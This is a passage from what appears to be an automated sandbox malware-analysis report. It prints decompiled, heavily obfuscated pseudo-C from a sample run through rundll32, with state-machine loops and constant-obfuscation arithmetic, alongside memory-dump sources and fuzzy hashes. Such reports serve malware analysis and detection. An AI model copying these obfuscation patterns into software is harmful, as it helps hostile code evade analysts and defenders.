                                                                                                                      				char _v88;
                                                                                                                      				char _v608;
                                                                                                                      				void* _t92;
                                                                                                                      				void* _t96;
                                                                                                                      				void* _t101;
                                                                                                                      				void* _t112;
                                                                                                                      				void* _t113;
                                                                                                                      
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				_push(__ecx);
                                                                                                                      				E006920B9(_t92);
                                                                                                                      				_v52 = _v52 & 0x00000000;
                                                                                                                      				_v56 = 0x878462;
                                                                                                                      				_t113 = _t112 + 0x14;
                                                                                                                      				_v32 = 0x956791;
                                                                                                                      				_t101 = 0x1300659;
                                                                                                                      				_v32 = _v32 + 0xffff68af;
                                                                                                                      				_v32 = _v32 ^ 0x0094d050;
                                                                                                                      				_v48 = 0xb6c679;
                                                                                                                      				_v48 = _v48 * 9;
                                                                                                                      				_v48 = _v48 ^ 0x0662f925;
                                                                                                                      				_v16 = 0xd9c762;
                                                                                                                      				_v16 = _v16 << 1;
                                                                                                                      				_v16 = _v16 | 0xb4c78449;
                                                                                                                      				_v16 = _v16 ^ 0xb5f30401;
                                                                                                                      				_v40 = 0x8b331e;
                                                                                                                      				_v40 = _v40 >> 0xc;
                                                                                                                      				_v40 = _v40 ^ 0x000c5129;
                                                                                                                      				_v28 = 0x1269f4;
                                                                                                                      				_v28 = _v28 >> 4;
                                                                                                                      				_v28 = _v28 ^ 0x0007e996;
                                                                                                                      				_v44 = 0xabd705;
                                                                                                                      				_v44 = _v44 ^ 0x9c90d177;
                                                                                                                      				_v44 = _v44 ^ 0x9c3fe788;
                                                                                                                      				_v8 = 0x357d72;
                                                                                                                      				_v8 = _v8 + 0xd90c;
                                                                                                                      				_v8 = _v8 ^ 0xccfdbdcb;
                                                                                                                      				_v8 = _v8 >> 3;
                                                                                                                      				_v8 = _v8 ^ 0x199e890f;
                                                                                                                      				_v12 = 0x32e6;
                                                                                                                      				_v12 = _v12 ^ 0x74a35607;
                                                                                                                      				_v12 = _v12 | 0x704b9008;
                                                                                                                      				_v12 = _v12 + 0xffff83aa;
                                                                                                                      				_v12 = _v12 ^ 0x74eee325;
                                                                                                                      				_v36 = 0xeddfb6;
                                                                                                                      				_v36 = _v36 << 0xa;
                                                                                                                      				_v36 = _v36 ^ 0xb77b8cf2;
                                                                                                                      				_v24 = 0xe2b758;
                                                                                                                      				_v24 = _v24 << 5;
                                                                                                                      				_v24 = _v24 * 0x38;
                                                                                                                      				_v24 = _v24 ^ 0x330719f5;
                                                                                                                      				_v20 = 0x9236d6;
                                                                                                                      				_v20 = _v20 | 0x3f0523f5;
                                                                                                                      				_v20 = _v20 >> 0xd;
                                                                                                                      				_v20 = _v20 ^ 0x000835ca;
                                                                                                                      				do {
                                                                                                                      					while(_t101 != 0x1300659) {
                                                                                                                      						if(_t101 == 0xa264c44) {
                                                                                                                      							_t96 = E00689D31(_v40,  &_v608, _v28, _t101, _v44, _v8);
                                                                                                                      							_t113 = _t113 + 0x10;
                                                                                                                      							_t101 = 0xbcabc0e;
                                                                                                                      							continue;
                                                                                                                      						}
                                                                                                                      						if(_t101 != 0xbcabc0e) {
                                                                                                                      							goto L8;
                                                                                                                      						}
                                                                                                                      						return E00696637( &_v88, _v12, _v36, _v24,  &_v608, _a12, _v20);
                                                                                                                      					}
                                                                                                                      					_t96 = E00684B61( &_v88, _v32, _v48, _v16);
                                                                                                                      					_t101 = 0xa264c44;
                                                                                                                      					L8:
                                                                                                                      				} while (_t101 != 0x478adce);
                                                                                                                      				return _t96;
                                                                                                                      			}























                                                                                                                      0x00696d74
                                                                                                                      0x00696d7b
                                                                                                                      0x00696d7f
                                                                                                                      0x00696d86
                                                                                                                      0x00696d86
                                                                                                                      0x00696d8c
                                                                                                                      0x00696dcd
                                                                                                                      0x00696dd2
                                                                                                                      0x00696dd5
                                                                                                                      0x00000000
                                                                                                                      0x00696dd5
                                                                                                                      0x00696d90
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00696db0
                                                                                                                      0x00696de5
                                                                                                                      0x00696dec
                                                                                                                      0x00696dee
                                                                                                                      0x00696dee
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: %t$DL&$r}5
                                                                                                                      • API String ID: 0-2337153543
                                                                                                                      • Opcode ID: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                      • Instruction ID: 5bd5b68feaf558fab646d8909013fc408c82148fe4ea0e8ff37a6d5b24430373
                                                                                                                      • Opcode Fuzzy Hash: 7dbbebab4da4aa2abdde95fd686c9ed2a692aafdb7a56fb7eb10c47b438e4e0c
                                                                                                                      • Instruction Fuzzy Hash: 33412371D0020EABCF09DFE1D94A4EEBBB6FF48318F208199D51176260D3B54A59CFA9
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • __decode_pointer.LIBCMT ref: 1003B8CA
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350BB
                                                                                                                        • Part of subcall function 100350AE: TlsGetValue.KERNEL32 ref: 100350D2
                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 1003B8D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504977924.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504971779.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505002368.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505012299.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505019038.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                      • Associated: 00000009.00000002.505025411.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Value$ExceptionFilterUnhandled__decode_pointer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1958600898-0
                                                                                                                      • Opcode ID: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction ID: 13914855b6ed5f75d6cf868945e622cc1528c9e1cf50f9ea13f0b817109926cd
                                                                                                                      • Opcode Fuzzy Hash: 5a11b17b52fb02af9bc6982e0ec44a7269600518a9b7aa9640256876448a332b
                                                                                                                      • Instruction Fuzzy Hash: 7FC08C388087C04FEB1AD3354D8C30D3E00E713301FC00488DC80D5053EE99410C8323
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 93%
                                                                                                                      			E00691889(void* __ecx) {
                                                                                                                      				char _v520;
                                                                                                                      				char _v1040;
                                                                                                                      				char _v1560;
                                                                                                                      				short _v1564;
                                                                                                                      				intOrPtr _v1568;
                                                                                                                      				signed int _v1572;
                                                                                                                      				signed int _v1576;
                                                                                                                      				signed int _v1580;
                                                                                                                      				signed int _v1584;
                                                                                                                      				signed int _v1588;
                                                                                                                      				signed int _v1592;
                                                                                                                      				signed int _v1596;
                                                                                                                      				signed int _v1600;
                                                                                                                      				signed int _v1604;
                                                                                                                      				signed int _v1608;
                                                                                                                      				signed int _v1612;
                                                                                                                      				signed int _v1616;
                                                                                                                      				signed int _v1620;
                                                                                                                      				signed int _v1624;
                                                                                                                      				signed int _v1628;
                                                                                                                      				signed int _v1632;
                                                                                                                      				signed int _v1636;
                                                                                                                      				signed int _v1640;
                                                                                                                      				signed int _v1644;
                                                                                                                      				signed int _v1648;
                                                                                                                      				signed int _v1652;
                                                                                                                      				signed int _v1656;
                                                                                                                      				signed int _v1660;
                                                                                                                      				signed int _v1664;
                                                                                                                      				signed int _v1668;
                                                                                                                      				signed int _v1672;
                                                                                                                      				signed int _v1676;
                                                                                                                      				signed int _v1680;
                                                                                                                      				signed int _t323;
                                                                                                                      				signed int _t334;
                                                                                                                      				signed int _t337;
                                                                                                                      				signed int _t338;
                                                                                                                      				signed int _t339;
                                                                                                                      				signed int _t340;
                                                                                                                      				signed int _t341;
                                                                                                                      				signed int _t342;
                                                                                                                      				signed int _t343;
                                                                                                                      				signed int _t344;
                                                                                                                      				signed int _t345;
                                                                                                                      				signed int _t346;
                                                                                                                      				void* _t386;
                                                                                                                      				void* _t387;
                                                                                                                      				signed int* _t390;
                                                                                                                      
                                                                                                                      				_t390 =  &_v1680;
                                                                                                                      				_v1568 = 0xdfec4c;
                                                                                                                      				_t386 = __ecx;
                                                                                                                      				_v1564 = 0;
                                                                                                                      				_t387 = 0xea1969c;
                                                                                                                      				_v1596 = 0xb94d4f;
                                                                                                                      				_v1596 = _v1596 >> 2;
                                                                                                                      				_v1596 = _v1596 ^ 0x002b88ba;
                                                                                                                      				_v1604 = 0x7820e8;
                                                                                                                      				_t9 =  &_v1604; // 0x7820e8
                                                                                                                      				_t337 = 0x3f;
                                                                                                                      				_v1604 =  *_t9 / _t337;
                                                                                                                      				_v1604 = _v1604 << 6;
                                                                                                                      				_v1604 = _v1604 ^ 0x0075b154;
                                                                                                                      				_v1676 = 0xd796f6;
                                                                                                                      				_v1676 = _v1676 << 7;
                                                                                                                      				_t338 = 0x1f;
                                                                                                                      				_v1676 = _v1676 / _t338;
                                                                                                                      				_v1676 = _v1676 | 0x34dfec15;
                                                                                                                      				_v1676 = _v1676 ^ 0x37fcd475;
                                                                                                                      				_v1580 = 0x701ced;
                                                                                                                      				_t339 = 0x3b;
                                                                                                                      				_v1580 = _v1580 / _t339;
                                                                                                                      				_v1580 = _v1580 ^ 0x000eda5b;
                                                                                                                      				_v1584 = 0x3864f;
                                                                                                                      				_v1584 = _v1584 | 0xebab6106;
                                                                                                                      				_v1584 = _v1584 ^ 0xeba3c8dc;
                                                                                                                      				_v1668 = 0x7d6229;
                                                                                                                      				_v1668 = _v1668 + 0x90f9;
                                                                                                                      				_t340 = 0x7d;
                                                                                                                      				_v1668 = _v1668 * 0xd;
                                                                                                                      				_v1668 = _v1668 + 0x17d6;
                                                                                                                      				_v1668 = _v1668 ^ 0x06671cb6;
                                                                                                                      				_v1652 = 0x8dafad;
                                                                                                                      				_v1652 = _v1652 + 0xffffa237;
                                                                                                                      				_v1652 = _v1652 / _t340;
                                                                                                                      				_v1652 = _v1652 ^ 0xeab94c45;
                                                                                                                      				_v1652 = _v1652 ^ 0xeabb4144;
                                                                                                                      				_v1620 = 0x364acf;
                                                                                                                      				_v1620 = _v1620 + 0xffffd559;
                                                                                                                      				_v1620 = _v1620 ^ 0x476b0832;
                                                                                                                      				_v1620 = _v1620 ^ 0x4757dcec;
                                                                                                                      				_v1660 = 0xdffac8;
                                                                                                                      				_v1660 = _v1660 | 0xd3f81aab;
                                                                                                                      				_t341 = 0xd;
                                                                                                                      				_v1660 = _v1660 / _t341;
                                                                                                                      				_v1660 = _v1660 + 0x2ca8;
                                                                                                                      				_v1660 = _v1660 ^ 0x10473906;
                                                                                                                      				_v1636 = 0xafa95;
                                                                                                                      				_v1636 = _v1636 | 0x12b9adda;
                                                                                                                      				_v1636 = _v1636 + 0xca30;
                                                                                                                      				_t342 = 0x24;
                                                                                                                      				_v1636 = _v1636 / _t342;
                                                                                                                      				_v1636 = _v1636 ^ 0x008bc8e6;
                                                                                                                      				_v1612 = 0xa1b06d;
                                                                                                                      				_v1612 = _v1612 ^ 0xd927b519;
                                                                                                                      				_t334 = 0x1c;
                                                                                                                      				_v1612 = _v1612 / _t334;
                                                                                                                      				_v1612 = _v1612 ^ 0x07c55aff;
                                                                                                                      				_v1628 = 0xe475d7;
                                                                                                                      				_v1628 = _v1628 + 0xf351;
                                                                                                                      				_v1628 = _v1628 >> 9;
                                                                                                                      				_v1628 = _v1628 ^ 0x000b149a;
                                                                                                                      				_v1644 = 0xc98f78;
                                                                                                                      				_v1644 = _v1644 + 0xa497;
                                                                                                                      				_v1644 = _v1644 + 0xab0a;
                                                                                                                      				_v1644 = _v1644 ^ 0x9916dffd;
                                                                                                                      				_v1644 = _v1644 ^ 0x99d32d23;
                                                                                                                      				_v1572 = 0xdb2c8b;
                                                                                                                      				_v1572 = _v1572 ^ 0xa2354bd4;
                                                                                                                      				_v1572 = _v1572 ^ 0xa2e9b3f6;
                                                                                                                      				_v1616 = 0x8ac290;
                                                                                                                      				_v1616 = _v1616 | 0xd6340cba;
                                                                                                                      				_t343 = 0x17;
                                                                                                                      				_v1616 = _v1616 / _t343;
                                                                                                                      				_v1616 = _v1616 ^ 0x095403ec;
                                                                                                                      				_v1624 = 0xc9b33;
                                                                                                                      				_v1624 = _v1624 | 0xadec2c36;
                                                                                                                      				_t344 = 0x23;
                                                                                                                      				_v1624 = _v1624 / _t344;
                                                                                                                      				_v1624 = _v1624 ^ 0x04f29945;
                                                                                                                      				_v1672 = 0xce6284;
                                                                                                                      				_t345 = 0x1b;
                                                                                                                      				_v1672 = _v1672 * 0x47;
                                                                                                                      				_v1672 = _v1672 >> 0xb;
                                                                                                                      				_v1672 = _v1672 | 0xab5418c0;
                                                                                                                      				_v1672 = _v1672 ^ 0xab589207;
                                                                                                                      				_v1680 = 0xfb4294;
                                                                                                                      				_v1680 = _v1680 * 0x56;
                                                                                                                      				_v1680 = _v1680 >> 0xe;
                                                                                                                      				_v1680 = _v1680 >> 4;
                                                                                                                      				_v1680 = _v1680 ^ 0x000a896c;
                                                                                                                      				_v1576 = 0xa0fe48;
                                                                                                                      				_v1576 = _v1576 / _t345;
                                                                                                                      				_v1576 = _v1576 ^ 0x000b8e8e;
                                                                                                                      				_v1608 = 0x915f33;
                                                                                                                      				_v1608 = _v1608 + 0xfa43;
                                                                                                                      				_v1608 = _v1608 >> 0xc;
                                                                                                                      				_v1608 = _v1608 ^ 0x000a30cc;
                                                                                                                      				_v1648 = 0x21b71b;
                                                                                                                      				_v1648 = _v1648 ^ 0x78ef874e;
                                                                                                                      				_v1648 = _v1648 | 0x9c246086;
                                                                                                                      				_v1648 = _v1648 * 0x4a;
                                                                                                                      				_v1648 = _v1648 ^ 0x1ce73be6;
                                                                                                                      				_v1592 = 0x926794;
                                                                                                                      				_v1592 = _v1592 + 0xffff6f6e;
                                                                                                                      				_v1592 = _v1592 ^ 0x009c0ed2;
                                                                                                                      				_v1656 = 0x919083;
                                                                                                                      				_v1656 = _v1656 / _t334;
                                                                                                                      				_v1656 = _v1656 >> 2;
                                                                                                                      				_t346 = 0x67;
                                                                                                                      				_v1656 = _v1656 / _t346;
                                                                                                                      				_v1656 = _v1656 ^ 0x0003c4fa;
                                                                                                                      				_v1664 = 0xb12839;
                                                                                                                      				_v1664 = _v1664 ^ 0xbcb8295e;
                                                                                                                      				_v1664 = _v1664 + 0xe70b;
                                                                                                                      				_v1664 = _v1664 + 0xffffbcc9;
                                                                                                                      				_v1664 = _v1664 ^ 0xbc0a928f;
                                                                                                                      				_v1600 = 0x37ff42;
                                                                                                                      				_v1600 = _v1600 + 0xffff03fd;
                                                                                                                      				_v1600 = _v1600 >> 3;
                                                                                                                      				_v1600 = _v1600 ^ 0x000f4750;
                                                                                                                      				_v1632 = 0xbb4856;
                                                                                                                      				_v1632 = _v1632 * 0x4e;
                                                                                                                      				_v1632 = _v1632 | 0xf74fdfff;
                                                                                                                      				_v1632 = _v1632 ^ 0xff54b7ec;
                                                                                                                      				_v1640 = 0x73c8d7;
                                                                                                                      				_v1640 = _v1640 * 0x56;
                                                                                                                      				_v1640 = _v1640 << 0xb;
                                                                                                                      				_v1640 = _v1640 >> 7;
                                                                                                                      				_v1640 = _v1640 ^ 0x005dc3ee;
                                                                                                                      				_v1588 = 0xe2f656;
                                                                                                                      				_t323 = _v1588 * 0x57;
                                                                                                                      				_v1588 = _t323;
                                                                                                                      				_v1588 = _v1588 ^ 0x4d200bca;
                                                                                                                      				while(_t387 != 0x5de06da) {
                                                                                                                      					if(_t387 == 0xea1969c) {
                                                                                                                      						_t387 = 0xfa9128f;
                                                                                                                      						continue;
                                                                                                                      					} else {
                                                                                                                      						_t395 = _t387 - 0xfa9128f;
                                                                                                                      						if(_t387 != 0xfa9128f) {
                                                                                                                      							L8:
                                                                                                                      							__eflags = _t387 - 0xa8e801c;
                                                                                                                      							if(__eflags != 0) {
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							E0069DA22(_v1596, _v1604, _t395, _v1676,  &_v1040, _t346, _v1580);
                                                                                                                      							 *((short*)(E0068B6CF( &_v1040, _v1584, _v1668, _v1652))) = 0;
                                                                                                                      							E00688969(_v1620,  &_v520, _t395, _v1660, _v1636);
                                                                                                                      							_push(_v1644);
                                                                                                                      							_push(_v1628);
                                                                                                                      							E006847CE( &_v1040, _v1572, _v1612, _v1616, _v1624, E0069DCF7(_v1612, 0x681328, _t395),  &_v520, _v1672, _v1680);
                                                                                                                      							E0068A8B0(_v1576, _t329, _v1608);
                                                                                                                      							_t346 = _v1648;
                                                                                                                      							_t323 = E0068EA99(_t346, _t386, _v1592, _v1656,  &_v1560, _v1664);
                                                                                                                      							_t390 =  &(_t390[0x17]);
                                                                                                                      							if(_t323 != 0) {
                                                                                                                      								_t387 = 0x5de06da;
                                                                                                                      								continue;
                                                                                                                      							}
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      					return _t323;
                                                                                                                      				}
                                                                                                                      				_push(_v1588);
                                                                                                                      				_push( &_v1560);
                                                                                                                      				_push(_t346);
                                                                                                                      				_push(0);
                                                                                                                      				_push(0);
                                                                                                                      				_push(_v1640);
                                                                                                                      				_t346 = _v1600;
                                                                                                                      				_push(0);
                                                                                                                      				_t323 = E0068AB87(_t346, _v1632, __eflags);
                                                                                                                      				_t390 =  &(_t390[7]);
                                                                                                                      				_t387 = 0xa8e801c;
                                                                                                                      				goto L8;
                                                                                                                      			}



















































                                                                                                                      0x00000000
                                                                                                                      0x00691d8c
                                                                                                                      0x00691d8a
                                                                                                                      0x00691ca6
                                                                                                                      0x00691ddc
                                                                                                                      0x00691ddc
                                                                                                                      0x00691d9d
                                                                                                                      0x00691da8
                                                                                                                      0x00691da9
                                                                                                                      0x00691daa
                                                                                                                      0x00691dab
                                                                                                                      0x00691dac
                                                                                                                      0x00691db4
                                                                                                                      0x00691db8
                                                                                                                      0x00691db9
                                                                                                                      0x00691dbe
                                                                                                                      0x00691dc1
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.504875945.0000000000681000.00000020.00000800.00020000.00000000.sdmp, Offset: 00680000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.504869221.0000000000680000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      • Associated: 00000009.00000002.504894882.00000000006A3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_680000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: )b}$ x
                                                                                                                      • API String ID: 0-2724122486
                                                                                                                      • Opcode ID: 062b5547c4f4c6c4ac27c3abfd508c7440d9e95871469c233638e6607a283a24
                                                                                                                      • Instruction ID: 2f84ae0932499361f6de38ce0e55b379341f78b21c0acf0f3c61504d4f46212c
                                                                                                                      • Opcode Fuzzy Hash: 062b5547c4f4c6c4ac27c3abfd508c7440d9e95871469c233638e6607a283a24
                                                                                                                      • Instruction Fuzzy Hash: 64D122715083819FE368CF60C48A95BFBE2FFC5358F108A1DF1999A260D7B58949CF46
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      C-Code - Quality: 99%
                                                                                                                      			E0069473C() {
                                                                                                                      				intOrPtr _v4;
                                                                                                                      				intOrPtr _v8;
                                                                                                                      				intOrPtr _v12;
                                                                                                                      				signed int _v16;
                                                                                                                      				signed int _v20;
                                                                                                                      				signed int _v24;
                                                                                                                      				signed int _v28;
                                                                                                                      				signed int _v32;
                                                                                                                      				signed int _v36;
                                                                                                                      				signed int _v40;
                                                                                                                      				signed int _v44;
                                                                                                                      				signed int _v48;
                                                                                                                      				signed int _v52;
                                                                                                                      				signed int _v56;
                                                                                                                      				signed int _v60;
                                                                                                                      				signed int _v64;
                                                                                                                      				signed int _v68;
                                                                                                                      				signed int _v72;
                                                                                                                      				signed int _v76;
                                                                                                                      				signed int _v80;
                                                                                                                      				signed int _v84;
                                                                                                                      				signed int _v88;
                                                                                                                      				signed int _v92;
                                                                                                                      				signed int _v96;
                                                                                                                      				signed int _v100;
                                                                                                                      				void* _t218;
                                                                                                                      				signed int _t219;
                                                                                                                      				void* _t225;
                                                                                                                      				void* _t246;
                                                                                                                      				intOrPtr _t251;
                                                                                                                      				signed int _t252;
                                                                                                                      				signed int _t253;
                                                                                                                      				signed int _t254;
                                                                                                                      				signed int _t255;
                                                                                                                      				signed int _t256;
                                                                                                                      				signed int _t257;
                                                                                                                      				intOrPtr _t258;
                                                                                                                      				intOrPtr* _t259;
                                                                                                                      				signed int _t260;
                                                                                                                      				signed int* _t261;
                                                                                                                      
                                                                                                                      				_t261 =  &_v100;
                                                                                                                      				_v12 = 0xf244e3;
                                                                                                                      				_v8 = 0x291d6d;
                                                                                                                      				_t225 = 0x37f2dd7;
                                                                                                                      				_t251 = 0;
                                                                                                                      				_v4 = 0;
                                                                                                                      				_v68 = 0x555e8d;
                                                                                                                      				_v68 = _v68 + 0xfffff532;
                                                                                                                      				_v68 = _v68 | 0x235b50f0;
                                                                                                                      				_v68 = _v68 ^ 0x235e53ff;
                                                                                                                      				_v84 = 0xf72ec;
                                                                                                                      				_v84 = _v84 >> 7;
                                                                                                                      				_t252 = 0x19;
                                                                                                                      				_v84 = _v84 / _t252;
                                                                                                                      				_v84 = _v84 << 3;
                                                                                                                      				_v84 = _v84 ^ 0x000f09df;
                                                                                                                      				_v20 = 0xee8389;
                                                                                                                      				_t253 = 0x51;
                                                                                                                      				_v20 = _v20 * 0x29;
                                                                                                                      				_v20 = _v20 ^ 0x2635dc09;
                                                                                                                      				_v88 = 0xea545e;
                                                                                                                      				_t30 =  &_v88; // 0xea545e
                                                                                                                      				_v88 =  *_t30 / _t253;
                                                                                                                      				_t36 =  &_v88; // 0xea545e
                                                                                                                      				_t254 = 0x7a;
                                                                                                                      				_v88 =  *_t36 * 0x1c;
                                                                                                                      				_v88 = _v88 + 0xc9a8;
                                                                                                                      				_v88 = _v88 ^ 0x005db592;
                                                                                                                      				_v24 = 0x448750;
                                                                                                                      				_v24 = _v24 / _t254;
                                                                                                                      				_v24 = _v24 ^ 0x000cab3c;
                                                                                                                      				_v28 = 0x8cea36;
                                                                                                                      				_v28 = _v28 * 0x38;
                                                                                                                      				_v28 = _v28 ^ 0x1eda9ad9;
                                                                                                                      				_v100 = 0x8110ba;
                                                                                                                      				_v100 = _v100 + 0x3ab9;
                                                                                                                      				_v100 = _v100 ^ 0x336ca884;
                                                                                                                      				_v100 = _v100 + 0xffff8c66;
                                                                                                                      				_v100 = _v100 ^ 0x33e0711c;
                                                                                                                      				_v64 = 0x5ca85e;
                                                                                                                      				_v64 = _v64 >> 0x10;
                                                                                                                      				_v64 = _v64 * 0x4e;
                                                                                                                      				_v64 = _v64 ^ 0x000b11ab;
                                                                                                                      				_v44 = 0x2bb2b6;
                                                                                                                      				_v44 = _v44 | 0xbbfbcd5f;
                                                                                                                      				_v44 = _v44 ^ 0xbbf16182;
                                                                                                                      				_v72 = 0x855f4c;
                                                                                                                      				_v72 = _v72 ^ 0x87656771;
                                                                                                                      				_v72 = _v72 * 0x71;
                                                                                                                      				_v72 = _v72 ^ 0xf9f8e59a;
                                                                                                                      				_v96 = 0x938339;
                                                                                                                      				_v96 = _v96 << 8;
                                                                                                                      				_v96 = _v96 << 0xf;
                                                                                                                      				_v96 = _v96 ^ 0xcc040e17;
                                                                                                                      				_v96 = _v96 ^ 0x50841052;
                                                                                                                      				_v40 = 0xbe1d32;
                                                                                                                      				_v40 = _v40 + 0x9b9c;
                                                                                                                      				_v40 = _v40 ^ 0x00bc2d0e;
                                                                                                                      				_v56 = 0x9e5686;
                                                                                                                      				_v56 = _v56 + 0xffffd134;
                                                                                                                      				_v56 = _v56 + 0xffff1440;
                                                                                                                      				_v56 = _v56 ^ 0x0091c9b6;
                                                                                                                      				_v60 = 0xb7e614;
                                                                                                                      				_v60 = _v60 << 3;
                                                                                                                      				_v60 = _v60 >> 8;
                                                                                                                      				_v60 = _v60 ^ 0x00065aea;
                                                                                                                      				_v32 = 0x537989;
                                                                                                                      				_v32 = _v32 + 0xffff7fce;
                                                                                                                      				_v32 = _v32 ^ 0x005430a6;
                                                                                                                      				_v92 = 0x1586eb;
                                                                                                                      				_t255 = 0x27;
                                                                                                                      				_v92 = _v92 * 0x18;
                                                                                                                      				_v92 = _v92 >> 7;
                                                                                                                      				_v92 = _v92 * 0x26;
                                                                                                                      				_v92 = _v92 ^ 0x009f543a;
                                                                                                                      				_v52 = 0xc32f0b;
                                                                                                                      				_v52 = _v52 | 0xcd8d244f;
                                                                                                                      				_v52 = _v52 >> 4;
                                                                                                                      				_v52 = _v52 ^ 0x0cd427c3;
                                                                                                                      				_v36 = 0xd9cf6a;
                                                                                                                      				_v36 = _v36 / _t255;
                                                                                                                      				_v36 = _v36 ^ 0x000f5a1a;
                                                                                                                      				_v16 = 0xbb623f;
                                                                                                                      				_v16 = _v16 ^ 0xe760556d;
                                                                                                                      				_v16 = _v16 ^ 0xe7dfff62;
                                                                                                                      				_v76 = 0x7fa35c;
                                                                                                                      				_v76 = _v76 >> 0xa;
                                                                                                                      				_v76 = _v76 + 0xffff049d;
                                                                                                                      				_v76 = _v76 ^ 0x38c60922;
                                                                                                                      				_v76 = _v76 ^ 0xc73f93c8;
                                                                                                                      				_v80 = 0x34ea16;
                                                                                                                      				_v80 = _v80 | 0x70dfffff;
                                                                                                                      				_t256 = 0x78;
                                                                                                                      				_t257 = _v16;
                                                                                                                      				_t260 = _v16;
                                                                                                                      				_t224 = _v16;
                                                                                                                      				_v80 = _v80 / _t256;
                                                                                                                      				_v80 = _v80 ^ 0x00f0b2be;
                                                                                                                      				_v48 = 0x2ab377;
                                                                                                                      				_v48 = _v48 << 0xd;
                                                                                                                      				_v48 = _v48 + 0x21bb;
                                                                                                                      				_v48 = _v48 ^ 0x5663e2ae;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					_push(0x5c);
                                                                                                                      					while(_t225 != 0xb8820d) {
                                                                                                                      						if(_t225 == 0x1effdba) {
                                                                                                                      							_t219 = E0068912C(_v84, _v20, _t225, _v88, _t225, _v24, _v28);
                                                                                                                      							_t224 = _t219;
                                                                                                                      							_t261 =  &(_t261[5]);
                                                                                                                      							if(_t219 != 0) {
                                                                                                                      								_t225 = 0xb9a00d9;
                                                                                                                      								goto L11;
                                                                                                                      							}
                                                                                                                      						} else {
                                                                                                                      							if(_t225 == 0x37f2dd7) {
                                                                                                                      								_t225 = 0x43cb3ac;
                                                                                                                      								continue;
                                                                                                                      							} else {
                                                                                                                      								if(_t225 == 0x43cb3ac) {
                                                                                                                      									_t258 =  *0x6a3e10; // 0x0
                                                                                                                      									_t259 = _t258 + 0x1c;
                                                                                                                      									while( *_t259 != _t246) {
                                                                                                                      										_t259 = _t259 + 2;
                                                                                                                      									}
                                                                                                                      									_t257 = _t259 + 2;
                                                                                                                      									_t225 = 0x1effdba;
                                                                                                                      									goto L12;
                                                                                                                      								} else {
                                                                                                                      									if(_t225 == 0x5d9bea5) {
                                                                                                                      										E00698F9E(_v32, _v92, _v52, _v36, _t260);
                                                                                                                      										_t261 =  &(_t261[3]);
                                                                                                                      										_t225 = 0xb8820d;
                                                                                                                      										goto L11;
                                                                                                                      									} else {
                                                                                                                      										if(_t225 == _t218) {
                                                                                                                      											E0068E249(_v96, _t260, _v40, _v56, _v60);
                                                                                                                      											_t261 =  &(_t261[3]);
                                                                                                                      											_t251 =  !=  ? 1 : _t251;
                                                                                                                      											_t225 = 0x5d9bea5;
                                                                                                                      											L11:
                                                                                                                      											_t246 = 0x5c;
                                                                                                                      											L12:
                                                                                                                      											_t218 = 0x9850ebe;
                                                                                                                      											continue;
                                                                                                                      										} else {
                                                                                                                      											if(_t225 != 0xb9a00d9) {
                                                                                                                      												L22:
                                                                                                                      												if(_t225 != 0x8a80d0f) {
                                                                                                                      													continue;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												_t260 = E006842C4(_v100, _t224, _v64, _v68, _t257, _v44, _v72);
                                                                                                                      												_t261 =  &(_t261[5]);
                                                                                                                      												_t218 = 0x9850ebe;
                                                                                                                      												_t225 =  !=  ? 0x9850ebe : 0xb8820d;
                                                                                                                      												goto L1;
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      							}
